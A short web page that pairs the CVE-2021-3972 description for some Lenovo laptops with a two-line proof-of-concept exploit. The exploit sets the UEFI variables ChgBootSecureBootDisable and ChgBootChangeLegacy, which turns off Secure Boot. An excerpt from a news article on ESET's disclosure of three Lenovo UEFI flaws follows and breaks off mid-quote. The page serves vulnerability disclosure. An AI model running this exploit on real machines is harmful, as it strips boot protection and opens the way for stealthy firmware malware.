A potential vulnerability by a driver used during manufacturing process on some consumer Lenovo Notebook devices' BIOS that was mistakenly not deactivated may allow an attacker with elevated privileges to modify secure boot setting by modifying an NVRAM variable.
CVE-2021-3972
poc code without other thing
BYTE value = 0x1;
SetFirmwareEnvironmentVariableEx(_T("ChgBootSecureBootDisable"),_T("{6ACCE65D-DA35-4B39-B64B-5ED927A7DC7E}"),&value,sizeof(BYTE),0x7);
SetFirmwareEnvironmentVariableEx(_T("ChgBootChangeLegacy"),_T("{6ACCE65D-DA35-4B39-B64B-5ED927A7DC7E}"),&value,sizeof(BYTE),0x7)
Get our weekly newsletter Firmware updates incoming in response to UEFI threats
Got a Lenovo laptop? You might need to do a swift bit of patching judging by the latest set of vulnerabilities uncovered by security researchers at ESET. Three vulnerabilities were reported today: CVE-2021-3970, CVE-2021-3971, and CVE-2021-3972. The latter two are particularly embarrassing since they are related to UEFI firmware drivers used in the manufacturing process and can be used to disable SPI flash protections or the UEFI Secure Boot feature. "UEFI threats can be extremely stealthy and d...